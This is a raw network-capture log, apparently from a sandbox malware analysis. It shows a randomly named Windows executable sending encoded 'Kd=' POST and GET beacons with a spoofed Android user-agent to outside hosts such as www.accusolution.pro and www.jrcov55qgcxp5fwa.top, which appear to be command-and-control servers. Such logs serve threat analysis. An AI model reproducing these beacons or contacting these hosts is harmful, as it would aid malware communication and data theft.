Kd=uvJrQzrVDzcuJjyiTni788dspceajBp69zqZuZXWzS3yYr0irrP1qq590KOJhGqWnfqoc53R6zAy3094JG1vu+Sgrcq670ckIMY4iGuU3osXyOg+SvPg5Yrl9Ip5FcHo4cmFngqhdVJ6nF+wR2sNr76wBhjyn9rIE2xz09axnePt9NP5X4HJjkHHwdKCtvHWUp3fT9w=
Jan 11, 2025 05:44:09.091217995 CET	1236	IN	HTTP/1.1 404 Not Found Connection: close cache-control: private, no-cache, no-store, must-revalidate, max-age=0 pragma: no-cache content-type: text/html content-length: 1251 date: Sat, 11 Jan 2025 04:44:09 GMT server: LiteSpeed Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 [TRUNCATED] Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div><div style="color:#f0f0f0; font-size:12px;margin:auto;padding:0px 30px 0px 30px;position:relative;clear:both;height:100px;margin-top:-101px;background-color:#474747;border-top: 1px solid rgba(0,0,0,0.15);box-shadow: 0
Jan 11, 2025 05:44:09.091236115 CET	253	IN	Data Raw: 20 31 70 78 20 30 20 72 67 62 61 28 32 35 35 2c 20 32 35 35 2c 20 32 35 35 2c 20 30 2e 33 29 20 69 6e 73 65 74 3b 22 3e 0a 3c 62 72 3e 50 72 6f 75 64 6c 79 20 70 6f 77 65 72 65 64 20 62 79 20 4c 69 74 65 53 70 65 65 64 20 57 65 62 20 53 65 72 76 Data Ascii: 1px 0 rgba(255, 255, 255, 0.3) inset;"><br>Proudly powered by LiteSpeed Web Server<p>Please be advised that LiteSpeed Technologies Inc. is not a web hosting company and, as such, has no control over content found on this site.</p></div></bod

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
18	192.168.2.5	49998	185.68.108.243	80	5068	C:\Program Files (x86)\GlvujUmSQPSFYAmhfKWhnapJquKSJbOyxJDLzXuOFxYfjXNiFgQBTBfkYYV\yAMzZKaZoBLE.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 05:44:11.006884098 CET	823	OUT	POST /8s4j/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate Accept-Language: en-us Connection: close Cache-Control: no-cache Content-Length: 223 Content-Type: application/x-www-form-urlencoded Host: www.accusolution.pro Origin: http://www.accusolution.pro Referer: http://www.accusolution.pro/8s4j/ User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; SGH-M919 Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36 Data Raw: 4b 64 3d 75 76 4a 72 51 7a 72 56 44 7a 63 75 4a 43 43 69 52 45 4b 37 6f 73 64 72 30 73 65 61 70 68 70 32 39 7a 6d 5a 75 63 79 4e 77 6e 6e 79 59 4f 49 69 74 65 37 31 74 71 35 39 67 61 4f 47 38 57 71 4a 6e 66 6d 67 63 38 58 52 36 7a 55 79 33 78 42 34 4a 78 68 73 74 4f 53 75 74 63 71 34 32 55 63 6b 49 4d 59 34 69 43 48 78 33 6f 6b 58 78 2b 77 2b 55 4f 50 6a 69 34 72 6d 34 49 70 35 55 73 48 73 34 63 6d 7a 6e 68 32 48 64 54 4e 36 6e 46 4f 77 49 45 49 43 67 37 36 2b 4c 42 69 33 33 65 79 76 4f 33 42 79 2b 2f 62 6b 2f 66 54 37 34 37 2b 54 4e 61 50 68 77 45 72 2f 67 4f 43 31 38 66 6d 2f 4f 4b 6e 76 4e 71 6b 64 45 51 77 6b 39 57 79 30 30 38 38 4d 50 61 4f 39 51 4e 53 66 Data Ascii: Kd=uvJrQzrVDzcuJCCiREK7osdr0seaphp29zmZucyNwnnyYOIite71tq59gaOG8WqJnfmgc8XR6zUy3xB4JxhstOSutcq42UckIMY4iCHx3okXx+w+UOPji4rm4Ip5UsHs4cmznh2HdTN6nFOwIEICg76+LBi33eyvO3By+/bk/fT747+TNaPhwEr/gOC18fm/OKnvNqkdEQwk9Wy0088MPaO9QNSf
Jan 11, 2025 05:44:11.638737917 CET	1236	IN	HTTP/1.1 404 Not Found Connection: close cache-control: private, no-cache, no-store, must-revalidate, max-age=0 pragma: no-cache content-type: text/html content-length: 1251 date: Sat, 11 Jan 2025 04:44:11 GMT server: LiteSpeed Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 [TRUNCATED] Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div><div style="color:#f0f0f0; font-size:12px;margin:auto;padding:0px 30px 0px 30px;position:relative;clear:both;height:100px;margin-top:-101px;background-color:#474747;border-top: 1px solid rgba(0,0,0,0.15);box-shadow: 0
Jan 11, 2025 05:44:11.638756990 CET	253	IN	Data Raw: 20 31 70 78 20 30 20 72 67 62 61 28 32 35 35 2c 20 32 35 35 2c 20 32 35 35 2c 20 30 2e 33 29 20 69 6e 73 65 74 3b 22 3e 0a 3c 62 72 3e 50 72 6f 75 64 6c 79 20 70 6f 77 65 72 65 64 20 62 79 20 4c 69 74 65 53 70 65 65 64 20 57 65 62 20 53 65 72 76 Data Ascii: 1px 0 rgba(255, 255, 255, 0.3) inset;"><br>Proudly powered by LiteSpeed Web Server<p>Please be advised that LiteSpeed Technologies Inc. is not a web hosting company and, as such, has no control over content found on this site.</p></div></bod

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
19	192.168.2.5	49999	185.68.108.243	80	5068	C:\Program Files (x86)\GlvujUmSQPSFYAmhfKWhnapJquKSJbOyxJDLzXuOFxYfjXNiFgQBTBfkYYV\yAMzZKaZoBLE.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 05:44:13.552262068 CET	1840	OUT	POST /8s4j/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate Accept-Language: en-us Connection: close Cache-Control: no-cache Content-Length: 1239 Content-Type: application/x-www-form-urlencoded Host: www.accusolution.pro Origin: http://www.accusolution.pro Referer: http://www.accusolution.pro/8s4j/ User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; SGH-M919 Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36 Data Raw: 4b 64 3d 75 76 4a 72 51 7a 72 56 44 7a 63 75 4a 43 43 69 52 45 4b 37 6f 73 64 72 30 73 65 61 70 68 70 32 39 7a 6d 5a 75 63 79 4e 77 6e 76 79 59 38 77 69 72 4a 6e 31 73 71 35 39 2f 71 4f 46 38 57 72 56 6e 65 4f 6b 63 38 4c 42 36 31 51 79 32 54 5a 34 59 7a 5a 73 36 65 53 75 67 38 71 39 37 30 64 35 49 4d 6f 38 69 47 6a 78 33 6f 6b 58 78 34 55 2b 54 66 50 6a 67 34 72 6c 39 49 70 6c 46 63 48 51 34 63 75 6a 6e 68 43 49 64 44 74 36 6e 68 71 77 4b 58 73 43 70 37 36 38 4d 42 69 52 33 65 4f 77 4f 33 64 45 2b 2b 75 73 2f 59 2f 37 37 71 50 65 59 4c 6e 51 79 43 72 69 69 76 2b 46 6c 71 50 47 44 6f 66 58 51 71 6b 79 5a 69 74 50 78 79 79 4c 30 64 4e 31 61 62 4f 77 56 4e 6a 31 73 47 41 6a 46 65 58 31 74 5a 76 52 70 79 4e 62 34 36 33 36 6a 66 39 79 31 47 36 50 44 6d 72 33 37 6f 4d 73 61 35 68 43 68 48 66 74 4e 52 39 37 36 49 58 59 34 45 32 48 76 61 2f 67 74 48 73 70 51 58 73 41 4b 56 30 4e 52 30 52 59 65 38 48 33 4f 54 58 52 66 39 54 31 36 51 6d 65 36 77 62 2b 51 6d 48 49 4e 6c 74 65 6d 50 6f 70 42 4a 55 6b 70 4a 4b [TRUNCATED] Data Ascii: Kd=uvJrQzrVDzcuJCCiREK7osdr0seaphp29zmZucyNwnvyY8wirJn1sq59/qOF8WrVneOkc8LB61Qy2TZ4YzZs6eSug8q970d5IMo8iGjx3okXx4U+TfPjg4rl9IplFcHQ4cujnhCIdDt6nhqwKXsCp768MBiR3eOwO3dE++us/Y/77qPeYLnQyCriiv+FlqPGDofXQqkyZitPxyyL0dN1abOwVNj1sGAjFeX1tZvRpyNb4636jf9y1G6PDmr37oMsa5hChHftNR976IXY4E2Hva/gtHspQXsAKV0NR0RYe8H3OTXRf9T16Qme6wb+QmHINltemPopBJUkpJKAP6XVE6KfwdcsAtV8HjttNORKKEGbbiRFsehA+OxQ6uNef075JrgMTeW9Yp3sjnOHcFKXw26FPQKu9Gqx9oE2cS8B/+eGW/YTrrxZGCQUddFeCwM5HoLYaQf8q00Tx0Jms2ugnFmX8K2+PuPluLp9FrnL1ohH+2A6hv0V2jL4b2IDlu9dfb6+bToLFtrWrzpz5U6zqn0Yp7pCkMifmzIaDo8jz547TYCfJ2IyLwA3YpvtZ5c/9ZHu0VrnEt3MkJnzR23efMO5YfsmDgP3W9wGQyNh1VpLvt5yvIMxLayMZMs4pEtdPKXc8rMbrLmAdxpHCdfe0y2p1i7mjSHT368/08QLtiaRBPVo+Bnx5j5UfalAn11PlEW64O2IGCj12uupYeurYXD2I4tPyJUB0XknU6HKTX2oWNMoxa871D7CVrerPnytVbxoOzt6mEVflQ/fkn/dVrceyK4gaNPGllkVY1oMo2rHWopUl6NvPG25RGhUq+fMSXH73xQqIYREW5r3AoZtFSUjvIEjQMD/n64e1xtV+5iKmRScpMnhf5im4scJHIwDjqBEWPMyAsb+IhJTxeLbCIFefwexfa9ge0Rr/OWZZAfd+Fyx0qBHO93X0p8O6izUXdVSyUVx2gAQT+tFOhdPa7XUtLt6ZNNcD5iTw/XJ6SDNSwspS [TRUNCATED]
Jan 11, 2025 05:44:14.183406115 CET	1236	IN	HTTP/1.1 404 Not Found Connection: close cache-control: private, no-cache, no-store, must-revalidate, max-age=0 pragma: no-cache content-type: text/html content-length: 1251 date: Sat, 11 Jan 2025 04:44:14 GMT server: LiteSpeed Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 [TRUNCATED] Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div><div style="color:#f0f0f0; font-size:12px;margin:auto;padding:0px 30px 0px 30px;position:relative;clear:both;height:100px;margin-top:-101px;background-color:#474747;border-top: 1px solid rgba(0,0,0,0.15);box-shadow: 0
Jan 11, 2025 05:44:14.183439970 CET	253	IN	Data Raw: 20 31 70 78 20 30 20 72 67 62 61 28 32 35 35 2c 20 32 35 35 2c 20 32 35 35 2c 20 30 2e 33 29 20 69 6e 73 65 74 3b 22 3e 0a 3c 62 72 3e 50 72 6f 75 64 6c 79 20 70 6f 77 65 72 65 64 20 62 79 20 4c 69 74 65 53 70 65 65 64 20 57 65 62 20 53 65 72 76 Data Ascii: 1px 0 rgba(255, 255, 255, 0.3) inset;"><br>Proudly powered by LiteSpeed Web Server<p>Please be advised that LiteSpeed Technologies Inc. is not a web hosting company and, as such, has no control over content found on this site.</p></div></bod

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
20	192.168.2.5	50000	185.68.108.243	80	5068	C:\Program Files (x86)\GlvujUmSQPSFYAmhfKWhnapJquKSJbOyxJDLzXuOFxYfjXNiFgQBTBfkYYV\yAMzZKaZoBLE.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 05:44:16.092875004 CET	539	OUT	GET /8s4j/?Kd=jthLTDCvcQMkIiWuaX/K6uB1o7SeowFnyQimw/GD7x6/Y+l6zuu1jPcu9YPIxFu2hqeuZobX+ylz2ANUYAJ87sGQ/ef593tMNZAg23aCwNcsxbY/VsSG/4rC7o9NDd+huw==&Gr=hRRPf2Bx HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-us Connection: close Host: www.accusolution.pro User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; SGH-M919 Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
Jan 11, 2025 05:44:16.782670021 CET	1236	IN	HTTP/1.1 404 Not Found Connection: close cache-control: private, no-cache, no-store, must-revalidate, max-age=0 pragma: no-cache content-type: text/html content-length: 1251 date: Sat, 11 Jan 2025 04:44:16 GMT server: LiteSpeed Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 [TRUNCATED] Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div><div style="color:#f0f0f0; font-size:12px;margin:auto;padding:0px 30px 0px 30px;position:relative;clear:both;height:100px;margin-top:-101px;background-color:#474747;border-top: 1px solid rgba(0,0,0,0.15);box-shadow: 0
Jan 11, 2025 05:44:16.782686949 CET	253	IN	Data Raw: 20 31 70 78 20 30 20 72 67 62 61 28 32 35 35 2c 20 32 35 35 2c 20 32 35 35 2c 20 30 2e 33 29 20 69 6e 73 65 74 3b 22 3e 0a 3c 62 72 3e 50 72 6f 75 64 6c 79 20 70 6f 77 65 72 65 64 20 62 79 20 4c 69 74 65 53 70 65 65 64 20 57 65 62 20 53 65 72 76 Data Ascii: 1px 0 rgba(255, 255, 255, 0.3) inset;"><br>Proudly powered by LiteSpeed Web Server<p>Please be advised that LiteSpeed Technologies Inc. is not a web hosting company and, as such, has no control over content found on this site.</p></div></bod

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
21	192.168.2.5	50001	134.122.135.48	80	5068	C:\Program Files (x86)\GlvujUmSQPSFYAmhfKWhnapJquKSJbOyxJDLzXuOFxYfjXNiFgQBTBfkYYV\yAMzZKaZoBLE.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 05:44:22.191741943 CET	815	OUT	POST /vnow/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate Accept-Language: en-us Connection: close Cache-Control: no-cache Content-Length: 203 Content-Type: application/x-www-form-urlencoded Host: www.jrcov55qgcxp5fwa.top Origin: http://www.jrcov55qgcxp5fwa.top Referer: http://www.jrcov55qgcxp5fwa.top/vnow/ User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; SGH-M919 Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36 Data Raw: 4b 64 3d 5a 44 2b 30 4a 35 38 5a 4f 68 73 39 58 32 4d 2b 5a 4a 57 54 57 4f 53 55 4c 59 6c 55 35 4e 48 2f 4c 63 70 36 64 66 70 73 4e 50 36 48 34 65 6b 48 30 51 43 68 59 35 38 71 37 6a 75 6e 48 63 33 6a 61 54 42 30 4d 44 7a 4e 74 71 46 6b 30 7a 46 73 5a 6c 32 5a 73 43 6c 32 4f 45 44 4e 33 6b 4e 6b 32 42 55 44 2b 75 63 72 37 53 63 4d 4e 72 46 46 76 4c 32 31 48 78 61 54 4e 73 79 4e 45 42 33 6a 50 73 77 36 64 59 4e 6a 72 32 39 76 63 31 46 44 56 46 5a 49 6d 31 56 36 50 46 30 76 50 6f 79 31 71 54 7a 65 48 48 53 33 62 4a 47 79 71 52 64 53 74 41 31 39 45 49 55 4b 31 6a 41 72 41 46 6a 54 74 4f 39 76 65 70 59 3d Data Ascii: Kd=ZD+0J58ZOhs9X2M+ZJWTWOSULYlU5NH/Lcp6dfpsNP6H4ekH0QChY58q7junHc3jaTB0MDzNtqFk0zFsZl2ZsCl2OEDN3kNk2BUD+ucr7ScMNrFFvL21HxaTNsyNEB3jPsw6dYNjr29vc1FDVFZIm1V6PF0vPoy1qTzeHHS3bJGyqRdStA19EIUK1jArAFjTtO9vepY=
Jan 11, 2025 05:44:23.057192087 CET	708	IN	HTTP/1.1 404 Not Found Content-Length: 548 Content-Type: text/html Date: Sat, 11 Jan 2025 04:44:22 GMT Server: nginx X-Cache: BYPASS Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 [TRUNCATED] Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
22	192.168.2.5	50002	134.122.135.48	80	5068	C:\Program Files (x86)\GlvujUmSQPSFYAmhfKWhnapJquKSJbOyxJDLzXuOFxYfjXNiFgQBTBfkYYV\yAMzZKaZoBLE.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 05:44:24.739429951 CET	835	OUT	POST /vnow/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate Accept-Language: en-us Connection: close Cache-Control: no-cache Content-Length: 223 Content-Type: application/x-www-form-urlencoded Host: www.jrcov55qgcxp5fwa.top Origin: http://www.jrcov55qgcxp5fwa.top Referer: http://www.jrcov55qgcxp5fwa.top/vnow/ User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; SGH-M919 Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36 Data Raw: 4b 64 3d 5a 44 2b 30 4a 35 38 5a 4f 68 73 39 57 58 38 2b 61 71 2b 54 51 75 53 56 45 34 6c 55 76 39 47 58 4c 63 31 36 64 65 64 46 4f 39 65 48 34 2b 55 48 33 53 71 68 66 35 38 71 78 44 75 69 4e 38 33 6f 61 53 38 4c 4d 47 62 4e 74 70 35 6b 30 79 31 73 65 57 65 61 73 53 6c 6a 49 45 44 4c 70 55 4e 6b 32 42 55 44 2b 75 34 4e 37 53 45 4d 4f 62 56 46 67 4b 32 36 59 42 61 51 62 38 79 4e 41 42 33 6e 50 73 78 58 64 5a 52 4a 72 77 78 76 63 31 31 44 4d 30 5a 4a 38 6c 56 47 53 56 31 6a 46 49 2f 61 72 56 6e 4d 62 58 61 78 62 6f 75 6f 76 6e 73 34 33 69 39 56 58 6f 34 79 6c 77 49 63 52 31 43 36 33 74 74 66 41 2b 50 2f 56 47 39 39 51 4f 47 42 73 65 34 46 6f 67 77 38 70 34 38 41 Data Ascii: Kd=ZD+0J58ZOhs9WX8+aq+TQuSVE4lUv9GXLc16dedFO9eH4+UH3Sqhf58qxDuiN83oaS8LMGbNtp5k0y1seWeasSljIEDLpUNk2BUD+u4N7SEMObVFgK26YBaQb8yNAB3nPsxXdZRJrwxvc11DM0ZJ8lVGSV1jFI/arVnMbXaxbouovns43i9VXo4ylwIcR1C63ttfA+P/VG99QOGBse4Fogw8p48A
